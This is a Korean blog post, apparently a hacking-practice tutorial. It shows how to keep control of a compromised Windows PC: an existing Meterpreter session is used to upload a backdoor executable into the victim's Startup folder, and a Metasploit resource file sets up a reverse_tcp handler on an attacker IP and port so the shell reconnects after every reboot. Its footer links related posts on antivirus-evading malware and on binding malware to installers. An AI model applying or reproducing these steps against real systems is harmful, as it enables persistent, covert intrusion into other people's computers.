안녕들 하시죠 !
오늘은 지난번 게시물 'Backdoor malware 만들기'를 응용하여 피해자PC가 부팅 될때마다 세션이 연결되게 해보려고 합니다.
지난 게시물 msfconsole에서 피해자PC와 세션이 이어져 있는 상태에서부터 진행하겠습니다.
msfconsole에서 피해자PC의 C:\Users\hong\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 폴더로 이동해주세요.
여기서 주의할 점은 Start Menu 폴더로 들어갈때 쌍따옴표를 붙여줘야합니다. ( cd "Start Menu" )
폴더로 이동하신 후에 만든 악성파일을 upload 시키겠습니다.
이제 앞에서 줄줄이 작성했던 페이로드를 조금더 편한 리소스 파일로 만들겠습니다. ( 사실 처음부터 이렇게 할걸 그랬습니다... )
다음, vi hongpossible.rc 를 입력 하신 후에 i를 눌러 편집모드로 들어가주시구요.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp ( 페이로드 세팅 )
set lhost 192.168.0.132 ( 공격자 IP )
set lport 7777 ( 공격자 포트 )
exploit -j
를 작성 후 esc -> :wq 로 저장하고 빠져나옵니다.
그리고 난뒤에 msfconsole -q -r hongpossible.rc 로 리소스 파일을 실행 시켜주시면 피해자PC 세션에 연결되기를 기다리는 상태가됩니다.
피해자PC를 재부팅 해보겠습니다.
왼쪽 피해자PC의 시작프로그램에 보면 hongpossible.exe가 들어가 있고 재부팅하여 로그인을 하자마자 세션에 연결이 되는것을 볼수있습니다.
오늘은 여기까지 입니다 감사합니다 !
참고서적 이상한 「웹해킹 입문」 프리렉(2016) p172~191
studysecurity님의 블로그, Metasploit 실습2 참고
'보안 > System hacking' 카테고리의 다른 글
[1-4] ② 악성코드와 정상적인 설치파일 합치기 (6) | 2018.11.11 |
---|---|
[1-4] ① Veil-evasion을 이용한 백신에 탐지되지않는 악성코드 만들기 (0) | 2018.11.10 |
Veil framework 설치 (0) | 2018.10.28 |
Backdoor malware 만들기 (0) | 2018.10.26 |
Metasploit이란? (0) | 2018.10.25 |